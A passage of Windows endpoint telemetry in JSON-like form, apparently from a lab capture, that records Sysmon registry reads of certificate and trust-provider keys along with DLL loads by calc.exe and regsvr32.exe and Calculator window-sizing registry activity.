"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": 
"Software Publishing", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": 
"CTLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245270000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "Windows.UI.AppDefaults.dll", - "image_path": "C:\\Windows\\System32\\Windows.UI.AppDefaults.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573245420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573245420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_value": "WindowSizing", - "timestamp": 131883573245420000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573245420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573245420000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_value": "WindowSizing", - "timestamp": 131883573245420000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573245420000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - 
"timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\SysWOW64\\uxtheme.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573244020000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": 
"\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\PreferredLaunchWindowingMode", - "registry_value": "PreferredLaunchWindowingMode", - "timestamp": 131883573245580000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": 